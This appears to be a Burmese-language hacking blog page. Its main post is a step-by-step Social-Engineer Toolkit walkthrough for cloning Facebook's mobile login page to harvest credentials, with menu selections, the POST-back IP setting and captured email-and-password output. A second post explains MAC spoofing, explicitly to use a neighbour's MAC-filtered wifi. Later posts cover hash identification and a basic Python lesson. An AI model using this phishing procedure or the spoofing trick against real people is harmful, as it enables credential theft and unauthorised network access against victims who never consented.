News Update : I'm Repairing This Blog now. Thanks.

Social Engineering Attack / Website Cloning (ျမန္မာလို)

Penulis : KhitMinnyo on Thursday, November 30, 2017 | November 30, 2017

Thursday, November 30, 2017



Kali Linux
Make clone website with se toolkit
.
ေရးထားတာ ၾကာပါျပီ။ 2015 ကတည္းက ေရးခဲ့တာေလးပါ
.........................................
Terminal မွာ setoolkit လို႔ ရိုက္ေခၚလိုက္ပါ။ မွတ္မိလြယ္ေအာင္ ဒီိလို မွတ္ထားပါ (se tool kit) ေပါ့။ ရိုက္ရင္ေတာ့ ေပါင္းရိုက္ရတယ္ေနာ္။

root@kmn:~# setoolkit
ၾကားမွာ စာေတြ အမ်ားႀကီး ေဖ်ာက္ထားပါတယ္။ ေအာက္ဆံုး စာတန္းကိုပဲ အဓိက ေျပာခ်င္လို႔ပါ။ agreement ေမးတာေပါ့။
Do you agree to the terms of service [y/n]: y  ပဲ ေျဖရပါမယ္။
ဒါဆိုရင္ေတာ့ ကြ်န္ေတာ္တို႔ setoolkit ကို အသံုးျပဳႏိုင္ျပီျဖစ္ပါတယ္။

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set>
 သူ႔ရဲ႕ menu ေလးေတြကို ၾကည့္ရေအာင္ပါ။
အထက္ပါအတိုင္းပဲ ရွင္းရွင္းေလး ေဖာ္ျပထားတာကို ေတြ႕ရပါတယ္။ ကြ်န္ေတာ္ကေတာ့ ဒီေနရာမွာ Site clone လုပ္မွာျဖစ္လို႔ 1 ကိုပဲ ေရြးပါတယ္
set> 1 ေရးျပီး enter လိုက္ပါတယ္။ ေအာက္ပါအတိုင္း ေတြ႕ရပါတယ္။ 1 ထဲမွာတင္ ထပ္မံ ခြဲထားတဲ့ menu ေတြပါ။

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

set> 2 ကို ေရးလိုက္ပါတယ္။ Website Attack Vectors ကို သံုးမွာမို႔ပါ။ အေပၚက menu မွာ ျပန္ၾကည့္ရင္ 2) Website Attack Vectors ဆိုတာကို ေတြ႔ရမွာပါ။


ဘာက ဘာအတြက္ဆိုတာကို ENG လို ရွင္းျပထားတာေတြ ဒီအေပၚမွာ ရွိပါေသးတယ္။
   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack>3
   3) Credential Harvester Attack Method ကို သံုးမွာမို႔ ကြ်န္ေတာ္က  ၃  ေရြးလိုက္ပါတယ္။

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
 
   1) Web Templates
   2) Site Cloner #site ကို clone လုပ္မွာမို႔ ဒီ ဟာကိုပဲ သံုးပါမယ္။
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>
   2) Site Cloner ေနာ္

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:ဒီေနရာမွာ မိမိရဲ႕ ip address ကို ျဖည့္ရမွာျဖစ္ပါတယ္။ (ifconfig)

set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.10.10
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com

set:webattack> Enter the url to clone:https://m.facebook.com  ဒီေနရာမွာ ကိုယ္ clone လုပ္မယ့္ site ကို ျဖည့္ရမွာပါ။ ကြ်န္ေတာ္ကေတာ့ mobile user ကို target ထားျပီး ဒီလိုျဖည့္လိုက္ျခင္း ျဖစ္ပါတယ္။

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
[!] Apache may be not running, do you want SET to start the process? [y/n]: y
ဒီေနရာမွာ service apache start လုပ္မထားရေသးလို႔ ေမးတာပါ။ ကြ်န္ေတာ္ေျဖျပထားသလို y ေပါ့

[ ok ] Starting apache2 (via systemctl): apache2.service.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www/html directory
[*] All files have been copied to /var/www/html
[*] SET is now listening for incoming credentials. You can control-c out of this and completely exit SET at anytime and still keep the attack going.
[*] All files are located under the Apache web root directory: /var/www/html
[*] All fields captures will be displayed below.
[Credential Harvester is now listening below...]

ခုဆိုရင္ေတာ့ ကြ်န္ေတာ့္ target ဆီက ဝင္လာမယ့္ အခ်ိန္ကို ေစာင့္ေနျပီျဖစ္ပါတယ္။ သူ႔ဆီကို ေပးရမယ့္ link က ကြ်န္ေတာ္တို႔ ျဖည့္ခဲ့တဲ့ ip address ပါပဲ။
ကြ်န္ေတာ္က ေနရာ သံုးခုကေန ဝင္ျပထားပါတယ္


('Array\n',)
('(\n',)
('    [lsd] => AVooGz02\n',)
('    [display] => \n',)
('    [enable_profile_selector] => \n',)
('    [isprivate] => \n',)
('    [legacy_return] => 0\n',)
('    [profile_selector_ids] => \n',)
('    [return_session] => \n',)
('    [skip_api_login] => \n',)
('    [signed_next] => \n',)
('    [trynum] => 1\n',)
('    [timezone] => 480\n',)
('    [lgndim] => eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzQxLCJjIjoyNH0=\n',)
('    [lgnrnd] => 231856_Swb2\n',)
('    [lgnjs] => 1491186248\n',)
('    [email] => khitminnyo@gmail.com\n',)
('    [pass] => appleasdfghjkl\n',)
(')\n',)
('Array\n',)
('(\n',)
('    [lsd] => AVooGz02\n',)
('    [display] => \n',)
('    [enable_profile_selector] => \n',)
('    [isprivate] => \n',)
('    [legacy_return] => 0\n',)
('    [profile_selector_ids] => \n',)
('    [return_session] => \n',)
('    [skip_api_login] => \n',)
('    [signed_next] => \n',)
('    [trynum] => 1\n',)
('    [timezone] => -390\n',)
('    [lgndim] => eyJ3IjozOTMsImgiOjY5OSwiYXciOjM5MywiYWgiOjY5OSwiYyI6MzJ9\n',)
('    [lgnrnd] => 231856_Swb2\n',)
('    [lgnjs] => 1491200662\n',)
('    [email] => admin@khitminnyo.com\n',)
('    [pass] => ilovekalilinux2016.2\n',)
(')\n',)
('Array\n',)
('(\n',)
('    [lsd] => AVooGz02\n',)
('    [display] => \n',)
('    [enable_profile_selector] => \n',)
('    [isprivate] => \n',)
('    [legacy_return] => 0\n',)
('    [profile_selector_ids] => \n',)
('    [return_session] => \n',)
('    [skip_api_login] => \n',)
('    [signed_next] => \n',)
('    [trynum] => 1\n',)
('    [timezone] => \n',)
('    [lgndim] => \n',)
('    [lgnrnd] => 231856_Swb2\n',)
('    [lgnjs] => n\n',)
('    [email] => aeroplane@gmail.com\n',)
('    [pass] => flying123456\n',)
('    [login] => 1\n',)
(')\n',)



ဒီအခ်က္ေတြကို အသံုးျပဳဖို႔အတြက္ေတာ့ သတိထားစရာအခ်က္ ၂ခု ရွိပါတယ္။
၁။ ကိုယ့္ target နဲ႔ ကိုယ္ဟာ network တစ္ခုတည္းေအာက္မွာ ရွိေနရမယ္။ (same network)
၂။ မိမိ လိုခ်င္တာကို မရမခ်င္း အင္တာနက္ ခ်ိတ္ဆက္ထားဖို႔ လိုအပ္မွာ ျဖစ္ပါတယ္။
(Same Network မဟုတ္ဘဲ WAN မွာ အသံုးျပဳႏိုင္ဖို႔အတြက္ေတာ့ နည္းလမ္းေလးေတြ လိုပါတယ္)
ေအာက္ပါစာအုပ္ေလး မွာ အျပည့္အစံု ပါဝင္မွာျဖစ္ပါတယ္။ 😀😀😀
ဒီဇင္ဘာလ ၃ ရက္ေန႔မွာ စတင္ ျဖန္႔ခ်ီသြားမွာျဖစ္ပါတယ္။ စာအုပ္ေလးထဲမွာ Member Form ေလး တစ္ခု ပါ၀င္ျပီး Facebook Group ထဲ ဝင္ေရာက္ခြင့္ နဲ႔ http://www.mmaiotraining.org ကို ၀င္ေရာက္ၾကည့္ရႈခြင့္ပါ ပူးတြဲ ရရွိိမွာျဖစ္ပါတယ္။
မွတ္ခ်က္။      ။ www.khitminnyo.com တြင္ တင္ထားေသာ အေၾကာင္းအရာမ်ားႏွင့္ စာအုပ္တြင္ ပါဝင္သည့္ အေၾကာင္းအရာမ်ားသည္ တူညီျခင္း မရွိပါ။


terminal ကို ပိတ္လိုက္လည္း ရပါတယ္။ ကြန္ပ်ဴတာ မပိတ္ဖို႔နဲ႔ ကြန္ပ်ဴတာမွာ အင္တာနက္ ခ်ိတ္ထားဖို႔ သာ အဓိက လိုအပ္ပါတယ္။

ကိုယ္လိုခ်င္တာ မရမီေတာ့ ဒီလိုပဲ ေစာင့္ရမွာျဖစ္ပါတယ္။
အဲမွာ အားနည္းခ်က္တစ္ခု ရွိတာကေတာ့ ကြ်န္ေတာ္တို႔ ေပးတဲ့ ip link ကို ဖြင့္လိုက္တယ္ဆိုပါစို႔။ mail နဲ႔  password မွားသြားရင္ျဖစ္ျဖစ္ မွန္သြားရင္ျဖစ္ျဖစ္ မူလ website အစစ္ထဲကို ေရာက္သြားမွာျဖစ္ပါတယ္

password ဖိုင္ကို သြားဖြင့္ၾကည့္ခ်င္ရင္ေတာ့ file  >> other location >> Computer >> var >> www >> html ထဲမွာသြားဖြင့္ၾကည့္ႏိုင္ပါတယ္။
..............................................................................................................

Thanks


Khit Minnyo
comments | | Read More...

Macchanger in Kali Linux


Kali Linux
Changing Mac Address

apt-get install macchanger ကို အသံုးျပဳျပီး mac changer ကို ထည့္သြင္းရမွာျဖစ္ပါတယ္။ ထံုးစံအတိုင္း Y/n ဆို y  ေပါ့။
ျပီးရင္ ပံု၂ အတိုင္း box တစ္ခု ေပၚလာပါမယ္။  Keyboard မွာရွိတဲ့ left arrow key ကို သံုးျပီး no ေနရာကေန yes ဆီေရာက္ေအာင္ ေရႊ႕ပါ။ ပံု၃
ျပီးရင္ enter လိုက္ရံုပါပဲ။ macchanger ကို အသံုးျပဳႏိုင္ျပီျဖစ္ပါတယ္။

sources list ထဲမွာ ဒီစာေၾကာင္းတစ္ေၾကာင္း ထည့္ပါ
deb http://ftp.de.debian.org/debian sid main
ျပီးရင္ Save ျပီး ထံုးစံအတိုင္း apt-get update လုပ္ေပးလိုက္ပါ။

ျပီးသြားရင္ေတာ့ apt-get install macchanger-gtk ကို အသံုးျပဳျပီး ထပ္မံျဖည့္သြင္းပါ။ ျပီးဆံုးသြားျပီဆိုရင္ေတာ့ mac changer gtk ကို အသံုးျပဳႏိုင္ျပီျဖစ္ပါတယ္။ သြင္းျပီးျပီဆိုရင္ေတာ့ ခုန soruce ရဲ႕ ေရွ႕မွာ #  ေလးခံျပီး ပိတ္ထားလိုက္ပါ။

ဒါေလး မေျပာခင္မွာ ကြ်န္ေတာ္ ေျပာျပခ်င္တာေလး ရွိပါတယ္။ Mac Address ဆိုတာ ဘာလဲဆိုတာေပါ့။ Mac Address ဆိုတာဟာ media access control address (MAC address) ျဖစ္ပါတယ္။
Media Access Control address (MAC address) ဆိုတာ နက္၀က္ကဒ္ network adapter card or network interface card (NIC) ေတြအတြက္ unique identifier ထပ္တူညီျခင္း မရွိတဲ႔ ဂဏန္းေတြနဲ႔ အကၡရာေတြ သတ္မွတ္ေပးထားၿပီး ထုပ္လုပ္သူေတြက မွတ္ပုံတင္ထာတဲ့ address တစ္ခု ဆိုပါေတာ့။
OS ေတြမွာ MAC address က ေျခာက္စုံ (သုိ႔မဟုတ္) ဂဏန္း ၊ အကၡရာ ၁၂ လုံးနဲ႔ ကိုယ္စားျပဳ သတ္မွတ္ထားပါတယ္..MAC address မွာ ဂဏန္းအားျဖင္႔ ၀ ကေန ၉ အထိပါၿပီး ၊ အကၡရာအားျဖင္႔ A ကေန F အထိပါ၀င္ပါတယ္..တနည္းအားျဖင္႔ အဲ႔ဒီnumbers ေတြနဲ႔ characters ေတြကို ေပါင္းစပ္ထားျခင္းပါပဲ…ဥပမာ - 1A-2B-3C-4D-5E-6F

MAC Address ကို IEEE 802 Network ေတြမွာလည္း အသံုးျပဳသလို..Ethernet လို Network ေတြမွာပါ အသံုးျပဳၾကပါတယ္။ Printer , Camera , စတဲ့ ကြန္ပ်ဴတာဆက္စပ္ ပစၥည္းေတြမွာလဲ MAC Address ဆိုတာ သက္ဆိုင္ရာ ပစၥည္းတစ္ခုခ်င္း အလိုက္သူ႕ေနရာနဲ႕သူပါ၀င္ပါတယ္။
ထားပါေတာ့ ခု ေဆြးေႏြးမွာက အဲသည္ Mac Address ကို ဘာလို႔ ေျပာင္းပစ္မွာလဲေပါ့။
အခ်ိဳ႕ wifi လိုင္းေတြမွာ password လံုးဝ မထားပါဘူး။ ဘယ္အလံုးကိုေတာ့ ခ်ိတ္မယ္ ဘယ္အလံုးကိုေတာ့ လက္မခံဘူးဆိုတာကို Mac Address ေတြကို filter လုပ္ျပီး ထည့္သြင္းထားပါတယ္။ ဒါေၾကာင့္ တစ္ခါတစ္ရံမွာ ကြ်န္ေတာ္တို႔ ပတ္ဝန္းက်င္က wifi လိုင္းေတြကို password လည္း မေတြ႔ပါဘဲလ်က္က ခ်ိတ္ဆက္လို႔ မရ ျဖစ္တတ္ပါတယ္။ ဘာေၾကာင့္လဲဆိုရင္ေတာ့ ကြ်န္ေတာ္တို႔ mac address ကို လက္မခံတဲ့အတြက္ ျဖစ္ပါတယ္။
အဲအခါမွာ သံုးလို႔ ရေနတဲ့ တစ္ေယာက္ေယာက္ရဲ႕ ဖုန္း ဒါမွမဟုတ္ ကြန္ပ်ဴတာမွာရွိတဲ့ Mac Address ေလးကိုသာ ၾကည့္ႏိုင္ရင္ ကြ်န္ေတာ္တို႔ အဲသည္ Address အတိုင္းကို လိုက္ေျပာင္းျပီး သံုးလို႔ ရျပီေပါ့။ ဒါကေတာ့ MAC ADDRESS နဲ႔ ခ်ိတ္ဆက္ရတဲ့ ဝိုင္ဖိုင္ အမ်ိဳးအစားမ်ိဳးကို ဆိုလိုပါတယ္။

အဲသည္အပိုင္းေတြက ေနာက္မွ ေလ့လာရမွာျဖစ္လို႔ ထပ္ရွင္းမျပေတာ့ပါဘူး။ ဖုန္းေတြမွာဆိုရင္လည္း setting ထဲမွာ ေမႊေႏွာက္ရွာေဖြရင္ mac address ေတြ႔ပါမယ္။ linux shell ေလးတင္ျပီး ifconfig လို႔ ရိုက္လိုက္ရင္လည္း ေတြ႕ရမွာျဖစ္ပါတယ္။ ကြ်န္ေတာ္တို႔ကေတာ့ kali မွာမို႔ ifconfig ကို  terminal မွာ ရိုက္ရွာလိုက္ရံုပါပဲ။ ကြ်န္ေတာ္ နမူနာ ရွာျပထားပါတယ္

root@kmn:~# ifconfig
eth0: flags=4099  mtu 1500
        ether b8:2a:72:aa:d5:c6  txqueuelen 1000  (Ethernet)
ဒီအေပၚကေနရာမွာ ႀကိဳးနဲ႔ သံုးတဲ့ usb tethering  address ပါ
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1  (Local Loopback)
        RX packets 4592  bytes 346340 (338.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4592  bytes 346340 (338.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163  mtu 1500
        inet 192.168.10.10  netmask 255.255.255.0  broadcast 192.168.43.255
        inet6 fe80::b3e6:1b02:ca03:2c96  prefixlen 64  scopeid 0x20
ခုစာေၾကာင္းေအာက္မွာ ether ဆိုျပီး ျပထားတာ mac address ျဖစ္ပါတယ္။
        ether 55:4a:04:63:9a:0c  txqueuelen 1000  (Ethernet)
        RX packets 74695  bytes 85760925 (81.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 56898  bytes 10719183 (10.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ကိုယ့္ကိုယ္ကိုယ္ မက်ိန္းေသဘူး ထင္ရင္လည္း မိမိတို႔ဖုန္းကေန ဝိုင္ဖိုင္လႊင့္ခ်ိတ္လိုက္ပါ။ ျပီးရင္ လႊင့္ထားတဲ့ ဖုန္းရဲ႕ ththering setting ထဲက connected devices ဆိုတဲ့ထဲ ဝင္ၾကည့္လိုက္ရင္ကို wifi mac address ကို ေတြ႕ရမွာျဖစ္ပါတယ္။ (မိမိတို႔ အိမ္နီးခ်င္းမွာ mac address နဲ႔ အသံုးျပဳတဲ့ wifi လိုင္းေလးသာ ရွိလို႔ကေတာ့ ဒီတစ္ခ်က္တည္းနဲ႔တင္ အဆင္ေျပပါျပီ။ မိမိဖုန္းကေန ခဏ ေပးလႊင့္။ သူ႔ဖုန္းကို ခ်ိတ္ခိုင္း။ ျပီးရင္ သူ႔ mac address ကို screenshot ယူလိုက္။ ပြဲသိမ္းပါပဲ။ ကိုယ္က အဲအတိုင္း လိုက္ေျပာင္းျပီး သူ႔ဝိုင္ဖိုင္လိုင္းနဲ႔ ခ်ိတ္လိုက္တာနဲ႔ သံုးလို႔ ရျပီေလ။
wifi mac address ကို  zapya နဲ႔ ဖိုင္ကူးရင္းနဲ႔လညး္ ကိုယ့္ဘက္က host လုပ္ထားရင္ ယူလို႔ ရႏိုင္ပါတယ္။ ကဲ ေပရွည္သြားျပီ။ ခုန ရလာတဲ့ mac address ကို မွတ္ထားေပါ့။

macchanger-gtk လို႔ terminal မွာ ရိုက္ေခၚလိုက္မယ္ဆိုရင္လည္း ေပၚလာတဲ့ box မွာ option ေရြး (ပံု ၄)၊ type ေရြး (ပံု ၅)၊ change လို႔ ရပါျပီ။ မိမိ add ကို ၾကည့္ခ်င္ေသးတယ္ဆိုရင္လည္း See current mac address ကို ႏွိပ္ၾကည့္ႏိုင္ပါတယ္။ ခု gtk ကေတာ့ random ပဲ ေျပာင္းဦးမွာမို႔ option မွာ random ပဲ ေရြးေပါ့။ ဒါမွမဟုတ္ တစ္ခုစီ လိုက္ေရြး စမ္းၾကည့္္ေပါ့။


.......................................................................
Thanks


Khit Minnyo
comments | | Read More...

Hashing in Kali Linux




Kali Linux
Hash Identifier (How to Hash ID)
Hash identifier ကို စတင္ အသံုးျပဳရန္အတြက္ Application >> Passwords Attack ကို တစ္ခ်က္ ႏွိပ္လိုက္ဖို႔ လိုပါတယ္။ အဲမွာ သူ႔ အမ်ိဳးအစားအလိုက္ ျပန္ခြဲထားတဲ့ထဲကမွ offline attacks ဆိုတာကို ေရြးျပီး click လိုက္ပါ။ ညာဘက္မွာ offline tools  ေတြ ေတြ႕ျမင္ရမွာျဖစ္ပါတယ္။ အဲထဲမွာ hash identifier ကို ဖြင့္လိုက္လို႔ ရပါတယ္။ မရွင္းလ်င္ ပံု၁ ကို ၾကည့္ပါ။

Terminal ကေန ေခၚသံုးခ်င္ရင္ေတာ့ ေအာက္ပါအတိုင္း အလြယ္တကူ ရိုက္ေခၚႏိုင္မွာပါ။ စာလံုးေပါင္းေတာ့ မွန္ဖို႔ လိုပါတယ္ဗ်။

root@kmn:~# hash-identifier
   #########################################################################
   # __  __     __ ______    _____    #
   # /\ \/\ \    /\ \ /\__  _\  /\  _ `\    #
   # \ \ \_\ \     __      ____ \ \ \___ \/_/\ \/  \ \ \/\ \    #
   # \ \  _  \  /'__`\   / ,__\ \ \  _ `\    \ \ \   \ \ \ \ \    #
   #   \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \     \_\ \__ \ \ \_\ \    #
   #    \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/    #
   #     \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   # By Zion3R #
   # www.Blackploit.com #
   #        Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH:

Day 5 မွာ ေျပာင္းခဲ့တဲ့ HashCode ေတြ ကို မွတ္မိေသးရဲ႕လား။ အဲဒါေတြကို ဒီေနရာကေန ျပန္ေဖာ္ၾကည့္မွာျဖစ္ပါတယ္။  မမွတ္မိရင္ ျပန္ၾကည့္ပါ။

[*] CHOOSE ONE OF THE OPTIONS BELOW TO CONTINUE:

A) ENCODE - MD5
B) ENCODE - SHA1
C) ENCODE - SHA224
D) ENCODE - SHA256
E) ENCODE - SHA384
F) ENCODE - SHA512
G) ENCODE/DECODE - BASE64
H) ENCODE/DECODE - BINARY
I) ENCODE/DECODE - HEXADECIMAL
J) ENCODE/DECODE - CIPHER OF CESAR
K) REVERSE - TEXT
L) REVERSE - WORDS

q) EXIT


⟫⟫⟫ A

PLACE THE TEXT YOU WANT TO ENCRYPT IN MD5: Khit Minnyo

8d624182c69579d8ce3eb700af4b3a56 ဒါကေတာ့ ကြ်န္ေတာ့္နာမည္ကို ေျပာင္းလိုက္လို႔ ရလာတဲ့  Hash Code ပါ
Day 5 Lesson မွာလည္း ရွင္းျပျပီးသားျဖစ္ပါတယ္။ ခု ကြ်န္ေတာ္တို႔က Day 5 မွာ ရွင္းျပီးသားကို ဘာလို႔ ျပန္သံုးမွာလဲ။ ေမးစရာရွိပါတယ္။
Day 5 lesson မွာက python3 hashcode-en.py ကို အသံုးျပဳျပီး စာသားေတြကို HashCode အျဖစ္ ေျပာင္းလဲခဲ့တာ ျဖစ္ပါတယ္။ ဒါဆိုရင္ ကြ်န္ေတာ္တို႔အေနနဲ႔ အဲမွာပဲ ျပန္ေဖာ္လို႔ မရဘူးလားလို႔ ေမးစရာရွိပါတယ္။
A) ENCODE - MD5
B) ENCODE - SHA1
C) ENCODE - SHA224
D) ENCODE - SHA256
E) ENCODE - SHA384
F) ENCODE - SHA512
G) ENCODE/DECODE - BASE64
H) ENCODE/DECODE - BINARY
I) ENCODE/DECODE - HEXADECIMAL
J) ENCODE/DECODE - CIPHER OF CESAR
အထက္ပါ menu ကို ၾကည့္လိုက္ရင္ သိသာပါတယ္။ သူက ဘာ form နဲ႔ လာမွန္းမသိပါဘူး။ ဥပမာ ေျပာျပရရင္ ကြ်န္ေတာ္တို႔ ထုတ္ယူလိုက္တဲ့ စာသားက ဘာနဲ႔ ဝွက္ေရးထားလဲဆိုတာ မသိႏိုင္ပါဘူး။ MD5 လား AHA1 လား အမ်ားႀကီးပါပဲ။ ဒါေတြကို ဘာနဲ႔ ျပန္ေဖာ္ရမလဲဆိုတာက စဥ္းစားစရာ အခ်က္တစ္ခု ျဖစ္လာမွာပါ။ ဒီအေျခအေနကို ကူညီေပးမွာကေတာ့ ခု hash-identifier ပဲ ျဖစ္ပါတယ္။ အဲဒီမွာ ရ ထားတဲ့ စာသားေတြကို ျပန္ကူးထည့္ၾကည့္မယ္။
Day 5 မွာတုန္းက ကြ်န္ေတာ့္အေနနဲ႔ နမူနာ ေျပာင္းျပထားတဲ့ ကြ်န္ေတာ့္နာမည္ ကုဒ္ေလးကို ျပန္ထည့္ျပီး စမ္းၾကည့္လိုက္ပါတယ္။

root@kmn:~# hash-identifier ေခၚလိုက္တယ္
   #########################################################################
   # __  __     __ ______    _____    #
   # /\ \/\ \    /\ \ /\__  _\  /\  _ `\    #
   # \ \ \_\ \     __      ____ \ \ \___ \/_/\ \/  \ \ \/\ \    #
   # \ \  _  \  /'__`\   / ,__\ \ \  _ `\    \ \ \   \ \ \ \ \    #
   #   \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \     \_\ \__ \ \ \_\ \    #
   #    \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/    #
   #     \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   # By Zion3R #
   # www.Blackploit.com #
   #        Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 8d624182c69579d8ce3eb700af4b3a56
ကြ်န္ေတာ့္နာမည္ကို ေျပာင္းလို႔ ရ ထားတဲ့ ကုဒ္ေတြ ထည့္လိုက္တယ္

Possible Hashs: ဒါက ျဖစ္ႏိုင္ေျခ အရွိဆံုး list ပါ။
[+]  MD5   ***************   ဒီေကာင္က ပို ျပီး ျဖစ္ႏိုင္ေျခ အရွိဆံုးလို႔ ဆိုလိုပါတယ္
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
ျဖစ္ႏိုင္ေျခ အရွိဆံုး ကုဒ္ ပံုစံကို ေဖာ္ျပေပးထားတယ္/ MD5 ဆိုတာကို မွတ္ထားပါ။

ေအာက္ကဟာေတြကေတာ့ ျဖစ္ႏိုင္ေျခ နည္းတဲ့ ကုဒ္ေတြပါတဲ့။
Least Possible Hashs:
[+]  RAdmin v2.x
[+]  NTLM
[+]  MD4
[+]  MD2
[+]  MD5(HMAC)
[+]  MD4(HMAC)
[+]  MD2(HMAC)
[+]  MD5(HMAC(Wordpress))
[+]  Haval-128
[+]  Haval-128(HMAC)
[+]  RipeMD-128
[+]  RipeMD-128(HMAC)
[+]  SNEFRU-128
[+]  SNEFRU-128(HMAC)
[+]  Tiger-128
[+]  Tiger-128(HMAC)
[+]  md5($pass.$salt)
[+]  md5($salt.$pass)
[+]  md5($salt.$pass.$salt)
[+]  md5($salt.$pass.$username)
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($salt.$pass))
[+]  md5($salt.md5(md5($pass).$salt))
[+]  md5($username.0.$pass)
[+]  md5($username.LF.$pass)
[+]  md5($username.md5($pass).$salt)
[+]  md5(md5($pass))
[+]  md5(md5($pass).$salt)
[+]  md5(md5($pass).md5($salt))
[+]  md5(md5($salt).$pass)
[+]  md5(md5($salt).md5($pass))
[+]  md5(md5($username.$pass).$salt)
[+]  md5(md5(md5($pass)))
[+]  md5(md5(md5(md5($pass))))
[+]  md5(md5(md5(md5(md5($pass)))))
[+]  md5(sha1($pass))
[+]  md5(sha1(md5($pass)))
[+]  md5(sha1(md5(sha1($pass))))
[+]  md5(strtoupper(md5($pass)))

   -------------------------------------------------------------------------
 HASH:
ခုဆိုရင္ေတာ့ ကြ်န္ေတာ္တို႔အေနနဲ႔ ဘာကုဒ္နဲ႔ တြဲေရးထားတယ္ဆိုတာကို ခန္႔မွန္းမိျပီ ျဖစ္ပါတယ္။
.................................


Thanks


Khit Minnyo
comments | | Read More...

Python3 Lesson 4

Penulis : KhitMinnyo on Wednesday, November 29, 2017 | November 29, 2017

Wednesday, November 29, 2017


Lesson 1  မၾကည့္ရေသးသူမွာ ဒီစာေၾကာင္းကို ႏွိပ္ပါ
Lesson 2  မၾကည့္ရေသးသူမွာ ဒီစာေၾကာင္းကို ႏွိပ္ပါ
Lesson 3  မၾကည့္ရေသးသူမွာ ဒီစာေၾကာင္းကို ႏွိပ္ပါ


Python Programming
.
Functions in Python
ဒီခါေတာ့ ဖန္ရွင္ေလးေတြကို အဓိက ေဆြးေႏြးသြားပါမယ္။
Function ဆိုတာဟာ ဆက္စပ္ action တစ္ခုခုကို လုပ္ေဆာင္ဖို႔အတြက္ reusable code ေတြကို ေပါင္းစပ္ထားတဲ့ block တစ္ခုပါ။
Function ေတြဟာ ကြ်န္ေတာ္တို႔ ေရးဆြဲမယ့္ application ေတြရဲ႕ module ေတြကို ပိုေကာင္းေအာင္ လုပ္ေပးသလိုပဲ ကုဒ္ေတြ ျပန္သံုးတဲ့အခါလည္း အဆင္ေျပေအာင္ လုပ္ေဆာင္ေပးပါတယ္။
Python မွာေတာ့built-in function ေတြ အမ်ားႀကီး ပါဝင္ျပီး အလြန္အသံုးဝင္တဲ့ဖန္ရွင္ေတြ ပါဝင္ပါတယ္။ နမူနာေျပာရရင္ေတာ့  print function လိုမ်ိဳး ဖန္ရွင္ေတြ ျဖစ္ပါတယ္။
ကဲ ဥပမာေလး စလိုက္ရေအာင္။ (IDLE 3  မွာ ေရးလိုက္တယ္ဆိုတာေတာ့ ေျပာစရာမလိုေတာ့ဘူးထင္ပါတယ္။)
...................
>>> print ("Happy Birthday to you!")
Happy Birthday to you!
>>> print ("Happy Birthday to you!")
Happy Birthday to you!
>>> print ("Happy Birthday, dear Emily.")
Happy Birthday, dear Emily.
>>> print ("Happy Birthday to you! \n")
Happy Birthday to you!

>>> print ("Hope you have a wonderful birthday!")
Hope you have a wonderful birthday!
>>>
..........
